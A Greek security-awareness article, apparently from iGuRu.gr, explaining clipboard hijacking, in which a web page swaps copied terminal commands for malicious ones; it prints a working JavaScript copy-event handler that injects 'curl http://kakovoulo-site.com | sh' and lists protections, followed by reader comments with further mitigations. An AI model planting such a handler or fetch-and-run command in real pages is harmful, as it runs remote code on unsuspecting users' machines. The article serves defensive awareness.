Πως μπορούν να σας παραβιάσουν με ένα απλό copy-paste

Μια ασυνήθιστη επίδειξη hacking θα σας κάνει να σκεφτείτε δύο φορές πριν κάνετε οποιοδήποτε κείμενο αντιγραφή – επικόλληση.

copaste

Αυτός είναι ο λόγος που ΠΟΤΕ δεν πρέπει να αντιγράψετε εντολές επικόλλησης απευθείας στο τερματικό σας. Ρωτήστε οποιονδήποτε προγραμματιστή ή διαχειριστή εάν έχει αντιγράψει ποτέ μια γραμμή εντολών ή ένα απόσπασμα κώδικα από τον ιστό. Η απάντηση μάλλον θα ήταν ΝΑΙ. Θα υποθέτετε ότι αυτό που αντιγράψατε είναι αυτό που επικολλάτε, σωστά; Λοιπόν, όχι!

Νομίζετε ότι αντιγράφετε ένα πράγμα, αλλά αντικαθίσταται με κάτι άλλο, όπως κακόβουλο κώδικα. Το μόνο που χρειάζεται είναι μια ενιαία γραμμή κώδικα που εισάγεται στον κώδικα που αντιγράψατε για να δημιουργήσετε μια κερκόπορτα στην εφαρμογή σας.

Αυτή η επίθεση είναι πολύ απλή αλλά μπορεί να προκαλέσει μεγάλες ζημιές. Να δούμε πώς λειτουργεί στην πράξη:

Ευχαριστούμε τον Harel Friedlander για την εγγραφή αυτού του βίντεο.

Ας υποθέσουμε ότι ψάχνετε πώς να ενημερώσετε το ubuntu σας και βρήκατε την παρακάτω εντολή, Την αντιγράφετε. Δοκιμάστε το – αντιγράψτε και επικολλήστε την παρακάτω εντολή:

  Windows 10 (2004) Πρόβλημα με αφαίρεση διάταξης γλώσσας keyboard layout

$ sudo apt update

 

Εδώ είναι το JavaScript που τρέχει το exploit.

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',
        'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
    );
    e.preventDefault();
});

Πως να προστατευτώ;

Ο ασφαλέστερος τρόπος είναι να μην επικολλήσετε τίποτα από τον Ιστό στο τερματικό σας. Μια άλλη επιλογή είναι να προσθέσετε “#” πριν την επικόλληση, αυτό θα μετατρέψει την εντολή σε “σχόλιο” και δεν θα την εκτελέσει. Με αυτό τον τρόπο θα δείτε τι θα επικολλήσετε πριν το τρέξει το τερματικό σας. Μπορείτε φυσικά να επικολλήσετε την εντολή σε ένα txt αρχείο πριν την βάλετε στο terminal σας.
Επίσης πολλά τερματικά μπορούν να ρυθμιστούν ώστε να μην τρέχουν αυτόματα όταν επικολλάτε ένα “\n” (νέα γραμμή)

Το παραπάνω ήταν μόνο ένα παράδειγμα γιατί η ευαισθητοποίηση είναι απαραίτητη για την αποφυγή κάθε εισβολής. Υπάρχουν πολλά παραδείγματα πραγματικά κακόβουλα scripts που κυκλοφορούν στο διαδίκτυο.

Εγγραφή στο iGuRu.gr μέσω email

Το email σας για την αποστολή κάθε νέας δημοσίευσης

Ακολουθήσετε μας στο Google News iGuRu.gr at Google news

4 Comments

  1. Η άλλη εναλλακτική, βέβαια, είναι να χρησιμοποιήσεις έναν ενδιάμεσο προορισμό (π.χ. text editor), όπου θα φανεί τι πραγματικά έχεις μέσα στο clipboard σου.

  2. Καλησπέρα, Χρόνια Πολλά και Καλή Χρονιά!!

    Θα ήθελα να σε ευχαριστήσω κατ` αρχάς για τα ενημερωτικά άρθρα σου.

    Μία λύση ακόμα η οποία λύνει το παραπάνω πρόβλημα, λειτουργεί σε firefox, about:config >> dom.event.clipboardevents.enabled >> false.

    Ένας φίλος του πιο παραμετροποίησιμου browser στον κόσμο.

Αφήστε μια απάντηση

Your email address will not be published.

5  +  2  =  

Previous Story

designstripe : Δωρεάν δημιουργία σκίτσου

Next Story

Scientific American μείωση της σεξουαλικής ζωής σε όλο τον κόσμο